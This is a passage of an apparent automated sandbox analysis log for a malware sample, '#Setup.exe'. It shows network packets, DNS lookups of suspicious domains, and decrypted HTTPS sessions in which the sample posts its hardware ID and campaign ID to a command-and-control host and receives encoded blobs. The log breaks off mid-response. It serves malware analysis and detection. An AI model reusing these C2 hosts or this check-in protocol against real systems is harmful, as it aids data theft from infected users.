Dec 30, 2024 18:15:33.423861027 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:33.424112082 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:33.424125910 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:33.424175978 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:33.424181938 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:33.424220085 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:33.426676035 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:33.427109003 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:33.427122116 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:33.427174091 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:33.427179098 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:33.427212000 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:33.432647943 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:33.543765068 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:33.543787003 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:33.543998957 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:33.544008017 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:33.544064999 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:33.544981003 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:33.544995070 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:33.545063019 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:33.545069933 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:33.545110941 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:33.545237064 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:33.545253038 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:33.545288086 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:33.545294046 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:33.545325041 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:33.545341969 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:33.546207905 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:33.546222925 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:33.546283007 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:33.546288967 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:33.546330929 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:33.546432972 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:33.546447992 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:33.546487093 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:33.546499014 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:33.546504974 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:33.546531916 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:33.546533108 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:33.546576977 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:33.574321032 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:33.574330091 CET	443	49805	104.21.37.128	192.168.2.6
Dec 30, 2024 18:15:33.574342012 CET	49805	443	192.168.2.6	104.21.37.128
Dec 30, 2024 18:15:33.574347019 CET	443	49805	104.21.37.128	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 30, 2024 18:15:11.735482931 CET	62777	53	192.168.2.6	1.1.1.1
Dec 30, 2024 18:15:11.749209881 CET	53	62777	1.1.1.1	192.168.2.6
Dec 30, 2024 18:15:25.332319021 CET	62516	53	192.168.2.6	1.1.1.1
Dec 30, 2024 18:15:25.442421913 CET	53	62516	1.1.1.1	192.168.2.6
Dec 30, 2024 18:15:26.382446051 CET	54040	53	192.168.2.6	1.1.1.1
Dec 30, 2024 18:15:26.395981073 CET	53	54040	1.1.1.1	192.168.2.6
Dec 30, 2024 18:15:27.157646894 CET	53401	53	192.168.2.6	1.1.1.1
Dec 30, 2024 18:15:27.166522980 CET	53	53401	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 30, 2024 18:15:11.735482931 CET	192.168.2.6	1.1.1.1	0x4964	Standard query (0)	locketsashayz.click	A (IP address)	IN (0x0001)	false
Dec 30, 2024 18:15:25.332319021 CET	192.168.2.6	1.1.1.1	0x8229	Standard query (0)	cegu.shop	A (IP address)	IN (0x0001)	false
Dec 30, 2024 18:15:26.382446051 CET	192.168.2.6	1.1.1.1	0x8d73	Standard query (0)	klipvumisui.shop	A (IP address)	IN (0x0001)	false
Dec 30, 2024 18:15:27.157646894 CET	192.168.2.6	1.1.1.1	0x16c1	Standard query (0)	dfgh.online	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 30, 2024 18:15:11.749209881 CET	1.1.1.1	192.168.2.6	0x4964	No error (0)	locketsashayz.click		188.114.97.3	A (IP address)	IN (0x0001)	false
Dec 30, 2024 18:15:11.749209881 CET	1.1.1.1	192.168.2.6	0x4964	No error (0)	locketsashayz.click		188.114.96.3	A (IP address)	IN (0x0001)	false
Dec 30, 2024 18:15:25.442421913 CET	1.1.1.1	192.168.2.6	0x8229	No error (0)	cegu.shop		185.161.251.21	A (IP address)	IN (0x0001)	false
Dec 30, 2024 18:15:26.395981073 CET	1.1.1.1	192.168.2.6	0x8d73	No error (0)	klipvumisui.shop		104.21.37.128	A (IP address)	IN (0x0001)	false
Dec 30, 2024 18:15:26.395981073 CET	1.1.1.1	192.168.2.6	0x8d73	No error (0)	klipvumisui.shop		172.67.208.58	A (IP address)	IN (0x0001)	false
Dec 30, 2024 18:15:27.166522980 CET	1.1.1.1	192.168.2.6	0x16c1	Name error (3)	dfgh.online	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

locketsashayz.click

cegu.shop

klipvumisui.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49710	188.114.97.3	443	2064	C:\Users\user\Desktop\#Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 17:15:12 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: locketsashayz.click
2024-12-30 17:15:12 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-30 17:15:12 UTC	1127	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 17:15:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=d3g04dpabk0hp2f0jl8t9fhs7o; expires=Fri, 25 Apr 2025 11:01:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1z8bIWBHXeRDD58NgkROyYRoAxK6tO72gE52MfIyANpF%2FXjcMY7zZSfoBmUDb0PJHMGdTh83g7NhAa4z5LZ72%2FMtO2fEAYGVLL6p%2BWXQV1TVjvYvbnuGve3SexLbg%2BIR9UcvZoYJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa3abaa7d3a42e0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1662&min_rtt=1648&rtt_var=646&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=910&delivery_rate=1656267&cwnd=252&unsent_bytes=0&cid=36a684e13a5785a4&ts=580&x=0"
2024-12-30 17:15:12 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-30 17:15:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49712	188.114.97.3	443	2064	C:\Users\user\Desktop\#Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 17:15:13 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 78 Host: locketsashayz.click
2024-12-30 17:15:13 UTC	78	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37 Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--TRON&j=637b55279021aab33278188cfa638397
2024-12-30 17:15:13 UTC	1125	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 17:15:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=m6hkni77ub1fpv3ujd3t7o2mkm; expires=Fri, 25 Apr 2025 11:01:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r27T9VeXjl9E9t0rT%2FyDWhkAObb%2FfdoB75b%2FZUVVkzDVFp9YOHDMpbEjjLYxTuPAnS6dWTT1PzJZOnqyBpLwcSKSNAkmYCl7DkTuOrQxznDWf8678VwV3Ek6tMcaljt0rWBp0M55"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa3abb09bd12369-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1796&min_rtt=1778&rtt_var=703&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=981&delivery_rate=1517671&cwnd=142&unsent_bytes=0&cid=221749a5f31e784b&ts=479&x=0"
2024-12-30 17:15:13 UTC	244	IN	Data Raw: 34 66 36 30 0d 0a 56 73 50 43 59 7a 48 64 76 75 76 6a 33 30 2b 63 52 55 73 6d 6d 53 77 6d 2f 70 66 66 4b 50 37 79 78 39 4b 66 39 6e 58 58 65 35 59 74 34 62 52 42 43 2b 6d 53 79 5a 43 36 62 61 59 78 4f 56 50 38 41 41 53 66 38 2f 30 53 6d 4a 4f 72 6f 66 72 61 56 36 45 57 74 47 79 6c 6f 77 39 43 75 4a 4c 4a 68 71 64 74 70 68 34 77 42 50 78 43 42 4d 53 31 75 6b 4b 63 6b 36 75 77 2f 70 30 61 70 78 66 31 50 71 2b 6c 43 31 53 2b 32 6f 71 50 73 69 72 35 49 43 70 4d 39 30 56 4c 6c 76 72 39 42 4e 79 58 76 66 43 6c 31 44 69 79 44 2f 63 62 6f 72 45 49 45 36 43 53 6b 4d 47 36 49 62 35 2f 61 55 66 38 54 6b 71 59 38 37 52 41 6c 70 71 6a 73 66 75 63 42 62 34 64 2f 6a 36 68 70 67 70 65 74 38 36 48 68 62 55 68 2f 79 6f 71 42 4c 55 4f 51 34 Data Ascii: 4f60VsPCYzHdvuvj30+cRUsmmSwm/pffKP7yx9Kf9nXXe5Yt4bRBC+mSyZC6baYxOVP8AASf8/0SmJOrofraV6EWtGylow9CuJLJhqdtph4wBPxCBMS1ukKck6uw/p0apxf1Pq+lC1S+2oqPsir5ICpM90VLlvr9BNyXvfCl1DiyD/cborEIE6CSkMG6Ib5/aUf8TkqY87RAlpqjsfucBb4d/j6hpgpet86HhbUh/yoqBLUOQ4
2024-12-30 17:15:13 UTC	1369	IN	Data Raw: 53 31 35 51 72 50 6f 71 61 68 37 49 45 61 70 52 2b 30 4b 2b 2b 35 51 56 53 7a 6e 4e 48 42 74 53 48 77 49 69 70 4c 2f 45 39 45 6a 76 71 39 53 5a 53 59 6f 62 72 79 6d 78 69 37 45 2f 4d 38 71 4b 63 4f 56 4c 66 61 68 6f 4c 39 59 37 34 67 4d 51 53 6a 44 6d 53 4d 39 72 35 65 6b 59 48 6c 72 37 4f 4e 56 37 49 56 74 47 7a 68 70 67 39 53 73 74 79 62 69 62 59 6d 2b 7a 55 69 54 66 5a 44 52 4a 48 2f 73 6b 6d 63 6c 36 2b 36 38 70 34 54 75 42 54 79 4e 4b 48 67 54 78 4f 34 78 4d 6e 5a 2f 51 37 37 4e 79 35 49 37 51 78 2b 33 4f 72 7a 55 39 79 58 71 66 43 6c 31 42 2b 77 47 76 63 2f 72 71 4d 4a 57 4b 33 63 6d 34 65 77 4b 4f 77 68 4c 45 72 78 54 56 61 57 2b 37 74 4a 6c 5a 75 73 74 66 71 51 56 2f 74 5a 38 79 7a 68 2b 45 46 79 73 74 65 46 69 36 6f 74 76 6a 68 6e 58 62 74 4a 53 Data Ascii: S15QrPoqah7IEapR+0K++5QVSznNHBtSHwIipL/E9Ejvq9SZSYobrymxi7E/M8qKcOVLfahoL9Y74gMQSjDmSM9r5ekYHlr7ONV7IVtGzhpg9SstybibYm+zUiTfZDRJH/skmcl6+68p4TuBTyNKHgTxO4xMnZ/Q77Ny5I7Qx+3OrzU9yXqfCl1B+wGvc/rqMJWK3cm4ewKOwhLErxTVaW+7tJlZustfqQV/tZ8yzh+EFysteFi6otvjhnXbtJS
2024-12-30 17:15:13 UTC	1369	IN	Data Raw: 46 6b 5a 7a 6c 2f 72 32 54 44 2f 56 42 74 42 36 69 74 41 4a 5a 2f 65 6d 4b 6a 37 4d 71 36 47 63 32 43 75 49 4f 51 35 43 31 35 51 71 52 6b 61 32 32 37 35 73 61 74 68 66 36 4f 36 53 76 43 56 4f 2f 30 59 79 46 74 69 62 39 4b 69 31 57 38 55 35 4d 6d 66 53 33 51 4e 7a 65 35 62 66 6c 31 45 2f 31 4b 4f 4d 2f 34 35 55 43 58 62 48 62 6e 38 47 69 59 2b 64 6e 4c 6b 69 37 46 67 53 52 2f 62 68 50 6b 35 47 76 76 76 69 65 47 37 30 58 39 79 61 75 70 41 46 66 74 39 61 45 6a 37 6b 6c 39 79 77 69 51 76 74 50 54 74 79 37 2f 55 32 45 30 50 33 77 79 5a 4d 62 75 42 61 32 41 61 4b 75 44 31 53 70 6e 4a 62 50 70 47 33 35 4b 32 6b 63 75 30 4a 4e 6e 50 36 33 54 70 79 58 71 4c 58 2b 6b 78 53 34 48 76 34 36 70 71 51 4e 57 72 4c 61 69 59 61 35 4b 4f 77 69 49 45 6a 33 44 67 72 63 38 71 Data Ascii: FkZzl/r2TD/VBtB6itAJZ/emKj7Mq6Gc2CuIOQ5C15QqRka2275sathf6O6SvCVO/0YyFtib9Ki1W8U5MmfS3QNze5bfl1E/1KOM/45UCXbHbn8GiY+dnLki7FgSR/bhPk5GvvvieG70X9yaupAFft9aEj7kl9ywiQvtPTty7/U2E0P3wyZMbuBa2AaKuD1SpnJbPpG35K2kcu0JNnP63TpyXqLX+kxS4Hv46pqQNWrLaiYa5KOwiIEj3Dgrc8q
2024-12-30 17:15:13 UTC	1369	IN	Data Raw: 35 62 66 78 31 45 2f 31 45 50 30 6d 72 36 34 49 58 72 6e 55 6a 6f 2b 77 4a 76 67 73 4c 6b 50 39 51 30 79 52 38 4c 35 4c 6d 4a 71 33 73 2f 61 65 47 72 39 5a 75 6e 53 6d 75 45 45 4c 2f 2f 75 46 71 4b 30 32 37 44 46 70 57 37 56 58 42 4a 76 35 2f 52 4c 63 6b 36 71 35 38 70 77 66 75 68 62 77 4f 71 65 6d 44 46 61 77 31 70 75 4a 73 79 44 31 4b 43 4a 57 2b 30 4e 41 6b 50 47 31 51 5a 62 51 36 2f 44 36 6a 46 66 74 57 63 45 35 72 71 41 43 52 66 2f 44 78 35 6a 39 4b 76 4a 6e 63 51 54 33 51 45 53 54 2b 62 46 42 6c 4a 47 70 76 76 71 52 48 72 30 52 35 6a 57 6c 71 41 42 64 73 4e 32 4e 68 4c 67 70 2b 53 4d 76 53 37 73 41 42 4a 76 74 2f 52 4c 63 76 34 4b 46 76 37 55 74 39 51 61 36 4c 65 47 6e 44 52 50 6e 6e 49 57 43 73 53 58 78 49 53 42 49 38 55 64 50 6b 50 36 35 52 70 57 Data Ascii: 5bfx1E/1EP0mr64IXrnUjo+wJvgsLkP9Q0yR8L5LmJq3s/aeGr9ZunSmuEEL//uFqK027DFpW7VXBJv5/RLck6q58pwfuhbwOqemDFaw1puJsyD1KCJW+0NAkPG1QZbQ6/D6jFftWcE5rqACRf/Dx5j9KvJncQT3QEST+bFBlJGpvvqRHr0R5jWlqABdsN2NhLgp+SMvS7sABJvt/RLcv4KFv7Ut9Qa6LeGnDRPnnIWCsSXxISBI8UdPkP65RpW
2024-12-30 17:15:13 UTC	1369	IN	Data Raw: 4a 55 52 70 78 37 39 4a 71 2b 74 44 6c 75 33 31 59 69 46 75 43 44 34 4b 79 4e 46 2f 45 42 4b 6c 4c 58 7a 43 70 75 49 35 65 69 39 74 51 65 75 43 2b 49 35 67 4b 30 4f 45 36 43 53 6b 4d 47 36 49 62 35 2f 61 55 33 70 53 6b 6d 4f 2f 4c 70 45 6b 35 4f 33 73 66 43 66 42 62 49 57 38 44 4f 74 70 67 35 56 76 74 6d 44 6a 62 6f 6f 39 53 67 6c 42 4c 55 4f 51 34 53 31 35 51 71 79 6d 37 61 6e 2f 70 6f 63 6f 77 4b 30 4b 2b 2b 35 51 56 53 7a 6e 4e 48 42 76 69 62 31 49 79 6c 49 2b 30 70 4a 6e 4f 65 79 54 5a 75 5a 72 71 4c 33 6b 78 43 2b 45 66 38 37 70 37 49 4e 58 61 33 5a 6d 35 50 39 59 37 34 67 4d 51 53 6a 44 6e 4b 62 35 61 31 4a 33 71 47 7a 73 2b 75 66 47 72 6c 5a 36 33 71 34 34 41 5a 66 2f 34 54 4a 68 37 49 6b 2f 53 67 6f 54 66 64 44 51 5a 58 77 76 45 79 59 6d 71 2b 77 Data Ascii: JURpx79Jq+tDlu31YiFuCD4KyNF/EBKlLXzCpuI5ei9tQeuC+I5gK0OE6CSkMG6Ib5/aU3pSkmO/LpEk5O3sfCfBbIW8DOtpg5VvtmDjboo9SglBLUOQ4S15Qqym7an/pocowK0K++5QVSznNHBvib1IylI+0pJnOeyTZuZrqL3kxC+Ef87p7INXa3Zm5P9Y74gMQSjDnKb5a1J3qGzs+ufGrlZ63q44AZf/4TJh7Ik/SgoTfdDQZXwvEyYmq+w
2024-12-30 17:15:13 UTC	1369	IN	Data Raw: 70 58 37 58 53 6d 72 45 45 4c 2f 39 2b 4f 67 72 77 6e 39 79 73 6d 51 2f 39 63 54 70 76 6e 76 45 75 58 6e 61 6d 77 38 4a 6b 64 74 42 44 35 4f 4b 79 6e 42 6c 79 36 6e 4d 66 42 75 6a 57 2b 66 32 6c 6c 39 6b 56 49 78 36 2f 39 56 64 4b 4a 35 62 66 78 31 45 2f 31 47 66 34 78 71 36 30 43 58 4c 7a 4f 69 49 65 76 4c 66 4d 74 4f 30 37 77 53 30 6d 52 2b 4c 35 4d 6d 70 75 70 6f 76 53 55 46 4c 35 5a 75 6e 53 6d 75 45 45 4c 2f 2f 2b 65 6c 37 63 71 38 6a 45 69 52 66 68 59 53 59 79 31 38 77 71 4e 6c 37 54 77 70 59 49 48 6f 68 37 72 65 72 6a 67 42 6c 2f 2f 68 4d 6d 48 74 43 76 35 49 53 64 57 2f 6b 68 4c 6b 2f 79 30 54 70 53 54 70 62 54 35 6b 78 4b 32 46 66 38 7a 6f 71 38 46 57 72 48 56 68 73 48 7a 62 66 6b 2f 61 52 79 37 62 31 2b 66 2b 62 41 4b 67 39 36 38 38 50 71 59 56 Data Ascii: pX7XSmrEEL/9+Ogrwn9ysmQ/9cTpvnvEuXnamw8JkdtBD5OKynBly6nMfBujW+f2ll9kVIx6/9VdKJ5bfx1E/1Gf4xq60CXLzOiIevLfMtO07wS0mR+L5MmpupovSUFL5ZunSmuEEL//+el7cq8jEiRfhYSYy18wqNl7TwpYIHoh7rerjgBl//hMmHtCv5ISdW/khLk/y0TpSTpbT5kxK2Ff8zoq8FWrHVhsHzbfk/aRy7b1+f+bAKg9688PqYV
2024-12-30 17:15:13 UTC	1369	IN	Data Raw: 73 34 59 41 4b 52 62 72 62 6e 38 4f 49 4c 76 41 70 4c 6c 4b 37 55 58 76 53 74 62 77 4b 78 4b 6d 38 38 4f 76 55 54 2b 64 58 74 43 62 68 2b 45 45 55 76 4d 36 62 68 37 34 37 2f 57 41 58 65 74 78 59 54 70 76 6c 75 6c 32 54 30 4f 76 77 38 74 52 50 6a 46 6e 39 4d 37 71 78 46 31 36 76 32 38 6d 2b 38 32 33 6d 5a 33 45 45 7a 6b 31 4b 6b 76 4b 72 57 39 47 33 73 37 72 36 68 42 43 69 46 72 52 36 34 61 5a 42 43 2b 79 53 79 59 57 73 62 61 5a 33 65 78 2b 75 48 52 50 4d 70 36 49 45 68 64 43 7a 38 4b 58 47 57 66 55 4c 74 47 7a 68 35 77 4a 42 72 64 71 4b 6c 37 35 71 77 42 6b 4f 58 76 5a 49 55 34 33 4c 67 30 32 47 6e 61 4f 6e 37 4e 67 43 74 68 66 36 4d 37 66 67 54 78 4f 77 6e 4e 47 34 2f 57 57 2b 47 47 63 45 34 77 34 63 33 4d 43 2b 52 4a 4b 58 73 36 47 77 73 77 32 34 48 2b Data Ascii: s4YAKRbrbn8OILvApLlK7UXvStbwKxKm88OvUT+dXtCbh+EEUvM6bh747/WAXetxYTpvlul2T0Ovw8tRPjFn9M7qxF16v28m+823mZ3EEzk1KkvKrW9G3s7r6hBCiFrR64aZBC+ySyYWsbaZ3ex+uHRPMp6IEhdCz8KXGWfULtGzh5wJBrdqKl75qwBkOXvZIU43Lg02GnaOn7NgCthf6M7fgTxOwnNG4/WW+GGcE4w4c3MC+RJKXs6Gwsw24H+
2024-12-30 17:15:13 UTC	1369	IN	Data Raw: 57 52 50 34 33 35 75 54 75 79 37 6f 4a 47 35 36 78 57 6c 4b 6d 2f 53 72 57 6f 75 66 6d 34 37 6f 6c 78 6d 37 48 75 49 6c 34 65 35 42 58 50 2b 45 73 4d 48 31 62 63 46 70 61 56 79 37 46 67 53 70 39 72 4e 45 6d 34 61 30 2f 64 71 61 45 4c 51 50 35 43 4f 75 34 45 38 54 75 5a 7a 52 30 2f 4e 74 2b 6a 5a 70 48 4b 73 63 48 38 6d 6d 36 68 72 4f 6a 2b 75 70 76 59 4a 58 37 55 75 36 64 4c 50 67 57 52 50 34 33 35 75 54 75 79 37 6f 4a 47 35 36 78 57 6c 4b 6d 2f 53 72 57 6f 75 66 36 70 37 4c 74 53 6d 4c 44 50 63 36 72 36 63 58 51 76 2b 53 79 59 37 39 64 63 64 6e 59 51 54 45 41 41 53 45 74 65 55 4b 71 5a 4f 72 76 76 71 43 42 76 67 2b 2b 6a 4f 67 74 68 46 45 73 4a 4f 6e 74 35 78 74 73 47 63 76 42 4b 4d 63 43 74 7a 78 72 41 72 45 77 50 66 72 71 4d 64 41 35 55 76 72 65 72 6a Data Ascii: WRP435uTuy7oJG56xWlKm/SrWoufm47olxm7HuIl4e5BXP+EsMH1bcFpaVy7FgSp9rNEm4a0/dqaELQP5COu4E8TuZzR0/Nt+jZpHKscH8mm6hrOj+upvYJX7Uu6dLPgWRP435uTuy7oJG56xWlKm/SrWouf6p7LtSmLDPc6r6cXQv+SyY79dcdnYQTEAASEteUKqZOrvvqCBvg++jOgthFEsJOnt5xtsGcvBKMcCtzxrArEwPfrqMdA5Uvrerj
2024-12-30 17:15:13 UTC	1369	IN	Data Raw: 35 79 6b 6b 37 6f 39 2f 57 64 6e 42 50 63 4f 48 4e 7a 34 72 30 32 4d 6b 2b 6d 33 35 35 4e 58 71 6c 66 74 64 4c 66 67 57 51 44 78 6e 4a 76 42 35 57 32 35 4b 53 52 46 2b 45 42 48 6a 75 65 37 53 59 71 54 34 6f 37 44 75 51 57 79 43 66 64 32 6b 4b 30 46 52 61 72 66 6d 59 61 44 45 39 4d 31 4c 6c 54 34 44 47 69 62 2b 4c 46 30 6f 71 65 30 74 2b 33 57 4d 62 59 50 39 33 54 76 34 42 6b 54 35 35 79 6b 6b 37 6f 39 2f 57 55 46 51 2f 5a 43 42 49 4f 37 70 41 71 4b 30 50 33 6a 73 39 51 46 39 55 47 30 63 36 4b 79 45 31 57 38 79 6f 72 47 67 78 50 54 4e 53 35 55 2b 41 78 31 6b 66 47 72 58 35 2b 41 6f 6f 37 44 75 51 57 79 43 66 64 32 68 4a 70 44 59 71 6e 66 69 59 2b 36 62 62 42 6e 4d 51 53 6a 44 6d 6d 4f 38 71 31 4a 33 72 57 66 38 73 79 43 46 4c 55 58 38 33 54 76 34 41 30 54 Data Ascii: 5ykk7o9/WdnBPcOHNz4r02Mk+m355NXqlftdLfgWQDxnJvB5W25KSRF+EBHjue7SYqT4o7DuQWyCfd2kK0FRarfmYaDE9M1LlT4DGib+LF0oqe0t+3WMbYP93Tv4BkT55ykk7o9/WUFQ/ZCBIO7pAqK0P3js9QF9UG0c6KyE1W8yorGgxPTNS5U+Ax1kfGrX5+Aoo7DuQWyCfd2hJpDYqnfiY+6bbBnMQSjDmmO8q1J3rWf8syCFLUX83Tv4A0T

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49718	188.114.97.3	443	2064	C:\Users\user\Desktop\#Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 17:15:14 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=P68L60WHHINDA9M User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12840 Host: locketsashayz.click
2024-12-30 17:15:14 UTC	12840	OUT	Data Raw: 2d 2d 50 36 38 4c 36 30 57 48 48 49 4e 44 41 39 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 45 44 41 34 32 42 31 32 35 41 39 32 45 31 39 31 44 44 43 42 37 41 42 36 43 39 43 34 34 42 30 0d 0a 2d 2d 50 36 38 4c 36 30 57 48 48 49 4e 44 41 39 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 36 38 4c 36 30 57 48 48 49 4e 44 41 39 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 50 36 38 4c 36 30 Data Ascii: --P68L60WHHINDA9MContent-Disposition: form-data; name="hwid"4EDA42B125A92E191DDCB7AB6C9C44B0--P68L60WHHINDA9MContent-Disposition: form-data; name="pid"2--P68L60WHHINDA9MContent-Disposition: form-data; name="lid"hRjzG3--TRON--P68L60
2024-12-30 17:15:15 UTC	1125	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 17:15:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=nki4pgdroosb5hvm51njuv0a3a; expires=Fri, 25 Apr 2025 11:01:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: 